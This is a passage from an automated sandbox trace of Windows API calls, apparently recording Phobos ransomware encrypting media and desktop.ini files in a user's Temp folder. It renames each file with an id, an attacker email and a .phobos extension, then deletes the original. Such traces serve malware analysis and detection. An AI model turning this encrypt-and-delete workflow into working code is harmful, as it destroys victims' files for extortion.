lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0191.690] CryptDestroyKey (hKey=0xa32d28) returned 1 [0191.690] CloseHandle (hObject=0x134) returned 1 [0191.690] CloseHandle (hObject=0x194) returned 1 [0191.690] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kfgRjeDXn8iu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kfgrjedxn8iu.wav")) returned 1 [0191.691] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0191.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\nnfT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\nnft.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0191.692] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16284) returned 1 [0191.692] CloseHandle (hObject=0x194) returned 1 [0191.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\nnfT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\nnft.m4a")) returned 0x2020 [0191.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\nnfT.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\nnft.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\nnfT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\nnft.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0191.692] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0191.693] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0191.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\nnfT.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\nnft.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0191.693] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0191.693] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.693] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3f9c, lpOverlapped=0x0) returned 1 [0191.717] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3fa0, dwBufLen=0x3fa0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3fa0) returned 1 [0191.717] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3fa0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3fa0, lpOverlapped=0x0) returned 1 [0191.718] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0191.718] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.718] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0191.718] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0191.718] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0191.718] CryptDestroyKey (hKey=0xa32d28) returned 1 [0191.718] CloseHandle (hObject=0x194) returned 1 [0191.718] CloseHandle (hObject=0x134) returned 1 [0191.718] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\nnfT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\nnft.m4a")) returned 1 [0191.720] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0191.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oNAC4LxkBl6ADF.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\onac4lxkbl6adf.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0191.720] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=13897) returned 1 [0191.720] CloseHandle (hObject=0x134) returned 1 [0191.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oNAC4LxkBl6ADF.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\onac4lxkbl6adf.mp4")) returned 0x2020 [0191.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oNAC4LxkBl6ADF.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\onac4lxkbl6adf.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0191.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oNAC4LxkBl6ADF.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\onac4lxkbl6adf.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0191.721] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0191.721] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0191.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oNAC4LxkBl6ADF.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\onac4lxkbl6adf.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0191.722] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0191.722] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0191.722] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3649, lpOverlapped=0x0) returned 1 [0192.433] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3650, dwBufLen=0x3650 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3650) returned 1 [0192.433] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3650, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3650, lpOverlapped=0x0) returned 1 [0192.435] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a68) returned 1 [0192.435] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.435] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0192.435] CryptDestroyKey (hKey=0xa32a68) returned 1 [0192.435] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0192.435] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.435] CloseHandle (hObject=0x134) returned 1 [0192.435] CloseHandle (hObject=0x194) returned 1 [0192.435] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oNAC4LxkBl6ADF.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\onac4lxkbl6adf.mp4")) returned 1 [0192.436] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.437] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0192.437] CloseHandle (hObject=0x194) returned 1 [0192.437] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini")) returned 0x2006 [0192.437] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0192.437] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.437] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.438] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0192.438] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.438] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0192.439] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0192.439] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0192.440] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a68) returned 1 [0192.440] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.440] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.440] CryptDestroyKey (hKey=0xa32a68) returned 1 [0192.440] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.440] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.440] CloseHandle (hObject=0x194) returned 1 [0192.440] CloseHandle (hObject=0x134) returned 1 [0192.440] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini")) returned 1 [0192.441] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.442] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0192.442] CloseHandle (hObject=0x134) returned 1 [0192.442] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini")) returned 0x2006 [0192.442] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.442] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.442] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.450] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0192.450] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.450] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0192.451] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0192.451] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0192.452] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0192.452] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.452] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.452] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.452] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.452] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.452] CloseHandle (hObject=0x134) returned 1 [0192.452] CloseHandle (hObject=0x164) returned 1 [0192.452] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\desktop.ini")) returned 1 [0192.453] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.454] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0192.454] CloseHandle (hObject=0x164) returned 1 [0192.454] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini")) returned 0x2006 [0192.454] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.455] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.455] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.456] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0192.456] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.456] ReadFile (in: hFile=0x164, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0192.457] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0192.457] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0192.457] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0192.457] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.457] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.457] CryptDestroyKey (hKey=0xa32d28) returned 1 [0192.457] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.458] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.458] CloseHandle (hObject=0x164) returned 1 [0192.458] CloseHandle (hObject=0x134) returned 1 [0192.458] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\desktop.ini" 